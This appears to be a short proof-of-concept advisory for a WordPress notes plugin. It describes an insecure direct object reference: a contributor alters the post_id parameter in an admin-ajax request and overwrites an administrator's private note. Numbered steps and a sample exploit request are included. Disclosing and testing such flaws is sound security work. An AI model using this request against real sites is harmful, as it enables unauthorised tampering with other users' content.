Share
## https://sploitus.com/exploit?id=WPEX-ID:6E6AFE50-27F9-41FA-A94B-F44DF0850E2C
1. Create a note as an admin. View the source of the page to get the Note ID. This corresponds to the `post_id` parameter.
2. Login as a contributor
3. Add a new note and save
4. Edit the note and intecept the request change the `post_id` parameter to the Note ID from step one
5. When logged in as an admin, see that your original note has been modified by the contributor

```
https://example.com/wp-admin/admin-ajax.php?action=wpdn_update_note&post_id=__ADMIN-PRIVATE-NOTE__&post_content=%0A%09%09%09%09%09%09%09&post_title=Attacker+Note+Changes&note_visibility=private&note_color_text=red&note_color=%23f7846a&note_type=list&nonce=c4d50e759d
```